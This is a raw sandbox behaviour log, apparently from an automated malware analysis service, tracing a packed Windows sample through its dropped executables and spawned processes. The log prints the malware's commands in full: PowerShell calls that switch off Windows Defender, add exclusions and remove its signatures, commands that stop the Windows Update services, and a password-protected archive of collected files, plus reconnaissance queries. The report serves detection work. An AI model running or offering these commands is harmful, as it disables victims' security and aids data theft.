                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE ProcessId = 5064
                                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE ProcessId = 5064
                                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE ProcessId = 5064
                                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE ProcessId = 5064
                                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE ProcessId = 5064
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeFile read: C:\Windows\win.iniJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                  Source: based.exe, 00000008.00000002.2131887023.00007FFDFAC61000.00000040.00000001.01000000.00000018.sdmp, s.exe, 0000000C.00000003.1905885998.000000000688D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000002.2052320150.00007FFDF540E000.00000002.00000001.01000000.00000025.sdmp, main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                                  Source: based.exe, based.exe, 00000008.00000002.2131887023.00007FFDFAC61000.00000040.00000001.01000000.00000018.sdmp, s.exe, 0000000C.00000003.1905885998.000000000688D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000002.2052320150.00007FFDF540E000.00000002.00000001.01000000.00000025.sdmp, main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                                  Source: based.exe, based.exe, 00000008.00000002.2131887023.00007FFDFAC61000.00000040.00000001.01000000.00000018.sdmp, s.exe, 0000000C.00000003.1905885998.000000000688D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000002.2052320150.00007FFDF540E000.00000002.00000001.01000000.00000025.sdmp, main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                                  Source: based.exe, based.exe, 00000008.00000002.2131887023.00007FFDFAC61000.00000040.00000001.01000000.00000018.sdmp, s.exe, 0000000C.00000003.1905885998.000000000688D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000002.2052320150.00007FFDF540E000.00000002.00000001.01000000.00000025.sdmp, main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                                  Source: based.exe, based.exe, 00000008.00000002.2131887023.00007FFDFAC61000.00000040.00000001.01000000.00000018.sdmp, s.exe, 0000000C.00000003.1905885998.000000000688D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000002.2052320150.00007FFDF540E000.00000002.00000001.01000000.00000025.sdmp, main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                                  Source: based.exe, based.exe, 00000008.00000002.2131887023.00007FFDFAC61000.00000040.00000001.01000000.00000018.sdmp, s.exe, 0000000C.00000003.1905885998.000000000688D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000002.2052320150.00007FFDF540E000.00000002.00000001.01000000.00000025.sdmp, main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                                  Source: based.exe, 00000008.00000002.2124717831.000001EB875E4000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2118920183.000001EB875DD000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2120409481.000001EB875E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                  Source: based.exe, based.exe, 00000008.00000002.2131887023.00007FFDFAC61000.00000040.00000001.01000000.00000018.sdmp, s.exe, 0000000C.00000003.1905885998.000000000688D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000002.2052320150.00007FFDF540E000.00000002.00000001.01000000.00000025.sdmp, main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                                  Source: TS-240605-Millenium1.exeReversingLabs: Detection: 27%
                                  Source: TS-240605-Millenium1.exeVirustotal: Detection: 36%
                                  Source: TS-240605-Millenium1.exeString found in binary or memory: can't send non-None value to a just-started generator
                                  Source: TS-240605-Millenium1.exeString found in binary or memory: --help
                                  Source: TS-240605-Millenium1.exeString found in binary or memory: --help
                                  Source: TS-240605-Millenium1.exeString found in binary or memory: OINT: if this variable is set to 0, it disables the default debugger. It can be set to the callable of your debugger of choice. These variables have equivalent command-line options (see --help for details): PYTHONDEBUG
                                  Source: TS-240605-Millenium1.exeString found in binary or memory: OINT: if this variable is set to 0, it disables the default debugger. It can be set to the callable of your debugger of choice. These variables have equivalent command-line options (see --help for details): PYTHONDEBUG
                                  Source: based.exeString found in binary or memory: set-addPolicy
                                  Source: based.exeString found in binary or memory: id-cmc-addExtensions
                                  Source: based.exeString found in binary or memory: can't send non-None value to a just-started generator
                                  Source: based.exeString found in binary or memory: --help
                                  Source: based.exeString found in binary or memory: --help
                                  Source: based.exeString found in binary or memory: OINT: if this variable is set to 0, it disables the default debugger. It can be set to the callable of your debugger of choice. These variables have equivalent command-line options (see --help for details): PYTHONDEBUG
                                  Source: based.exeString found in binary or memory: OINT: if this variable is set to 0, it disables the default debugger. It can be set to the callable of your debugger of choice. These variables have equivalent command-line options (see --help for details): PYTHONDEBUG
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeFile read: C:\Users\user\Desktop\TS-240605-Millenium1.exeJump to behavior
                                  Source: unknownProcess created: C:\Users\user\Desktop\TS-240605-Millenium1.exe "C:\Users\user\Desktop\TS-240605-Millenium1.exe"
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeProcess created: C:\Users\user\Desktop\TS-240605-Millenium1.exe "C:\Users\user\Desktop\TS-240605-Millenium1.exe"
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe -pbeznogym
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe -pbeznogym
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeProcess created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeProcess created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"
                                  Source: C:\ProgramData\Microsoft\hacn.exeProcess created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"
                                  Source: C:\ProgramData\Microsoft\hacn.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe -pbeznogym
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe -pbeznogym
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeProcess created: C:\ProgramData\main.exe "C:\ProgramData\main.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeProcess created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeProcess created: C:\ProgramData\setup.exe "C:\ProgramData\setup.exe"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\ProgramData\svchost.exeProcess created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe a -r -hp"prometheus" "C:\Users\user\AppData\Local\Temp\wpNXr.zip" *"
                                  Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe a -r -hp"prometheus" "C:\Users\user\AppData\Local\Temp\wpNXr.zip" *
                                  Source: C:\ProgramData\svchost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                                  Source: C:\ProgramData\main.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp3F5C.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp3F5C.tmp.bat
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 5064"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find ":"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
                                  Source: C:\ProgramData\setup.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
                                  Source: C:\Windows\System32\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe Timeout /T 1 /Nobreak
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\dialer.exeProcess created: C:\Program Files\Google\Chrome\updater.exe "C:\Program Files\Google\Chrome\updater.exe"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
                                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 5064"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find ":"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe Timeout /T 1 /Nobreak
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 5064"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find ":"
                                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\dialer.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\ProgramData\Microsoft\hacn.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\timeout.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\ProgramData\setup.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeProcess created: C:\Users\user\Desktop\TS-240605-Millenium1.exe "C:\Users\user\Desktop\TS-240605-Millenium1.exe"Jump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe -pbeznogymJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe -pbeznogymJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeProcess created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeProcess created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe" Jump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeProcess created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe" Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe" Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe a -r -hp"prometheus" "C:\Users\user\AppData\Local\Temp\wpNXr.zip" *"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe -pbeznogymJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe -pbeznogymJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeProcess created: C:\ProgramData\main.exe "C:\ProgramData\main.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeProcess created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeProcess created: C:\ProgramData\setup.exe "C:\ProgramData\setup.exe" Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\ProgramData\main.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp3F5C.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp3F5C.tmp.bat
                                  Source: C:\ProgramData\svchost.exeProcess created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"
                                  Source: C:\ProgramData\setup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                  Source: C:\ProgramData\setup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                  Source: C:\ProgramData\setup.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
                                  Source: C:\ProgramData\setup.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                  Source: C:\ProgramData\setup.exeProcess created: unknown unknown
                                  Source: C:\ProgramData\setup.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                  Source: C:\ProgramData\svchost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe a -r -hp"prometheus" "C:\Users\user\AppData\Local\Temp\wpNXr.zip" *
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 5064"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find ":"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe Timeout /T 1 /Nobreak
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 5064"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find ":"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe Timeout /T 1 /Nobreak
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 5064"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find ":"
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 5064"
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
                                  Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                  Source: C:\Program Files\Google\Chrome\updater.exeProcess created: unknown unknown
                                  Source: C:\Program Files\Google\Chrome\updater.exeProcess created: unknown unknown
                                  Source: C:\Program Files\Google\Chrome\updater.exeProcess created: unknown unknown
                                  Source: C:\Program Files\Google\Chrome\updater.exeProcess created: unknown unknown
                                  Source: C:\Program Files\Google\Chrome\updater.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeSection loaded: vcruntime140.dllJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
